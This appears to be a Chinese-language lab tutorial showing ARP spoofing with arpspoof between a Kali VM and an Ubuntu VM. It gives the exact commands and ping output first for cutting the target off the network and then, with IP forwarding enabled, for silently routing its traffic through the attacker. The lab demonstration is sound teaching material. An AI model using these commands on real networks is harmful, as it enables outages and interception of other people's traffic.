環境
攻擊機:Kali Linux 2020.1 172.16.252.129
靶機:Ubuntu 16.04 172.16.252.138
網關:172.16.252.2
安裝arpspoof
Kali Linux 2020.1 VM版本身沒有arpspoof工具,需要自己安裝。arpspoof是dsniff的一個組件,直接安裝dsniff:
sudo apt-get install dsniff
斷網攻擊
命令格式:
arpspoof -i 網卡 -t 目標IP 網關
(可用route -n查看網關)
本環境中:
sudo arpspoof -i eth0 -t 172.16.252.138 172.16.252.2
靶機上ping 百度原本暢通,在被攻擊後就無法連通了,後面的ICMP包全丟:
ping www.baidu.com
PING www.a.shifen.com (39.156.66.18) 56(84) bytes of data.
64 bytes from 39.156.66.18: icmp_seq=1 ttl=128 time=16.3 ms
64 bytes from 39.156.66.18: icmp_seq=2 ttl=128 time=24.0 ms
64 bytes from 39.156.66.18: icmp_seq=3 ttl=128 time=24.4 ms
64 bytes from 39.156.66.18: icmp_seq=4 ttl=128 time=24.2 ms
^C
--- www.a.shifen.com ping statistics ---
19 packets transmitted, 4 received, 78% packet loss, time 18329ms
流量器已經無法訪問網頁。
ARP欺騙
在kali中開啓流量轉發功能,則目標不會斷網。
sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
關閉端口轉發:
sudo bash -c 'echo 0 > /proc/sys/net/ipv4/ip_forward'
查看端口轉發狀態:
cat /proc/sys/net/ipv4/ip_forward
(1:開啓;0:關閉)
開啓後再執行arp攻擊,靶機上ping命令輸出如下:
ping www.baidu.com
PING www.a.shifen.com (39.156.66.18) 56(84) bytes of data.
64 bytes from 39.156.66.18: icmp_seq=1 ttl=128 time=17.7 ms
64 bytes from 39.156.66.18: icmp_seq=2 ttl=128 time=16.7 ms
64 bytes from 39.156.66.18: icmp_seq=3 ttl=128 time=24.6 ms
64 bytes from 39.156.66.18: icmp_seq=4 ttl=128 time=24.9 ms
64 bytes from 39.156.66.18: icmp_seq=5 ttl=128 time=17.0 ms
64 bytes from 39.156.66.18: icmp_seq=6 ttl=128 time=23.9 ms
64 bytes from 39.156.66.18: icmp_seq=7 ttl=128 time=25.0 ms
From 172.16.252.129: icmp_seq=8 Redirect Host(New nexthop: 172.16.252.2)
64 bytes from 39.156.66.18: icmp_seq=8 ttl=128 time=19.5 ms
From 172.16.252.129: icmp_seq=9 Redirect Host(New nexthop: 172.16.252.2)
看到後面的ping應答是從攻擊機172.16.252.129返回的(暴露了呀)。
靶機上瀏覽網頁等上網功能一切正常,但此時流量已經流經攻擊機了。